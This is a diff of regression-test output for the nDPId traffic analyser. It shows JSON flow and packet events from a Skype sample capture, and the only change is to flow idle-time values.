+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1509,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":1431969706408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969706408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IiZAAEAGNo3AqAEiQTffD8O2Abu4rlNEyHp2R4AQECyvaQAAAQEICj4jhEkuudPJ"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":1431969706572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969706572,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOZv3UouwKgBIgG7w7R3epf\/xxwh7qASOJBfaQAAAgQFrAQCCApNhWbCPiODxwEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":1431969706572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969706572,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CZNAAEAGtVvAqAEib91KLsO0AbvHHCHud3qYAIAQECy1bQAAAQEICj4jhO1NhWbC"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1528,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969707326,"flow_last_seen":1431969707326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969707326,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1431969707326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969707326,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1ORAAEAGTF\/AqAEiQAQXpsO3Abu4qWeDAAAAALAC\/\/9x6QAAAgQFtAEDAwUBAQgKPiOH3AAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":1431969707546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969707546,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIgG7w7ccEsw5uKlnhKASOJDGigAAAgQFrAQCCApMP087PiOH3AEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1532,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1431969707546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969707546,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0EpBAAEAGDsDAqAEiQAQXpsO3Abu4qWeEHBLMOoAQECwc2gAAAQEICj4jiLdMP087"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1587,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969710853,"flow_last_seen":1431969710853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969710853,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1587,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1431969710853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969710853,"pkt":"0NQSxnP1PBXCt3IOCABFAABAz19AAEAG2DnAqAEinTg0HMO8nEnrI3UzAAAAALAC\/\/8PzQAAAgQFtAEDAwUBAQgKPiOVkAAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1589,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1431969711097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969711097,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIpxJw7we\/\/hU6yN1NKASOJAgZAAAAgQFrAQCCApMXGQgPiOVkAEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1431969711097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969711097,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CpBAAEAGnRXAqAEinTg0HMO8nEnrI3U0Hv\/4VYAQECx2mwAAAQEICj4jloNMXGQg"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1431969712913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChlVQAAAERcjPAqAEi7\/\/\/+sFNB2wAjXH\/TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} 00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} @@ -811,19 +811,19 @@ 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712918,"flow_last_seen":1431969712918,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969712918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1431969712918,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969712918,"pkt":"PBXCt3IO0NQSxnP1CABFwABEBYEAAEAB8QTAqAEBwKgBIgMDgJYAAAAARQAAKImhAABAEW2wwKgBIsCoAQHTMxTnABQgbAABAAAy3TLdAAAOEA=="} 00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712918,"flow_last_seen":1431969712918,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969712918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.041447} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712931,"flow_last_seen":1431969712931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969712931,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1431969712931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969712931,"pkt":"0NQSxnP1PBXCt3IOCABFAABAK1RAAEAGGV7AqAEiW77YfcO9MD57jsMsAAAAALAC\/\/8yeAAAAgQFtAEDAwUBAQgKPiOdpAAAAAAEAgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1624,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1431969712980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969712980,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0xLRAAPUGywBbvth9wKgBIjA+w71YjgIOe47DLYASH\/7LvwAAAgQFoAEDAwQBAQQC"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1625,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":1431969712981,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969712981,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoyL5AAEAGfAvAqAEiW77YfcO9MD57jsMtWI4CD1AQIAAMeQAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712931,"flow_last_seen":1431969712931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969712931,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1431969712931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969712931,"pkt":"0NQSxnP1PBXCt3IOCABFAABAK1RAAEAGGV7AqAEiW77YfcO9MD57jsMsAAAAALAC\/\/8yeAAAAgQFtAEDAwUBAQgKPiOdpAAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1624,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1431969712980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969712980,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0xLRAAPUGywBbvth9wKgBIjA+w71YjgIOe47DLYASH\/7LvwAAAgQFoAEDAwQBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1625,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":1431969712981,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969712981,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoyL5AAEAGfAvAqAEiW77YfcO9MD57jsMtWI4CD1AQIAAMeQAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1632,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":1431969713175,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969713175,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoTzkAAEARqBjAqAEiwKgBAdMzFOcAFCBsAAEAADLdMt0AAA4Q"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1633,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":2,"flow_last_seen":1431969713177,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969713177,"pkt":"PBXCt3IO0NQSxnP1CABFwABEBYIAAEAB8QPAqAEBwKgBIgMDgJYAAAAARQAAKE85AABAEagYwKgBIsCoAQHTMxTnABQgbAABAAAy3TLdAAAOEA=="} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1658,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969710853,"flow_last_seen":1431969713605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3582,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431969713605,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1658,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969710853,"flow_last_seen":1431969713605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3582,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431969713605,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":3,"flow_last_seen":1431969713715,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969713715,"pkt":"0NQSxnP1PBXCt3IOCABFAAAorjMAAEARSR7AqAEiwKgBAdMzFOcAFCBsAAEAADLdMt0AAA4Q"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":3,"flow_last_seen":1431969713717,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969713717,"pkt":"PBXCt3IO0NQSxnP1CABFwABEBYMAAEAB8QLAqAEBwKgBIgMDgJYAAAAARQAAKK4zAABAEUkewKgBIsCoAQHTMxTnABQgbAABAAAy3TLdAAAOEA=="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713736,"flow_last_seen":1431969713736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969713736,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1662,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1431969713736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969713736,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGB5AAEAGLJTAqAEiW77YfcO+MD4D6992AAAAALAC\/\/+KswAAAgQFtAEDAwUBAQgKPiOgwQAAAAAEAgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1665,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":1431969713779,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969713779,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0e5xAAPUGFBlbvth9wKgBIjA+w7686z9CA+vfd4ASH\/6FhgAAAgQFoAEDAwQBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":3,"flow_last_seen":1431969713779,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969713779,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoL3hAAEAGFVLAqAEiW77YfcO+MD4D6993vOs\/Q1AQIADGPwAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713736,"flow_last_seen":1431969713736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969713736,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1662,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1431969713736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969713736,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGB5AAEAGLJTAqAEiW77YfcO+MD4D6992AAAAALAC\/\/+KswAAAgQFtAEDAwUBAQgKPiOgwQAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1665,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":1431969713779,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969713779,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0e5xAAPUGFBlbvth9wKgBIjA+w7686z9CA+vfd4ASH\/6FhgAAAgQFoAEDAwQBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":3,"flow_last_seen":1431969713779,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969713779,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoL3hAAEAGFVLAqAEiW77YfcO+MD4D6993vOs\/Q1AQIADGPwAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuRSsAAEARjAjAqAEisBo3pzLd+R0AGvy6nPQCqlUgKb9nOC7NdHVpaZsV"} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -848,84 +848,84 @@ 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1431969713965,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713965,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuUbAAAEARRubAqAEiQTffJzLdAbsAGjQZnQ4ChKdksriBAZEnlRRV2r4X"} 00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714165,"flow_last_seen":1431969714165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714165,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1431969714165,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714165,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXlBAAEAG5mHAqAEiW77YfcO\/AbtO2k10AAAAALAC\/\/\/+rQAAAgQFtAEDAwUBAQgKPiOiXAAAAAAEAgAA"} 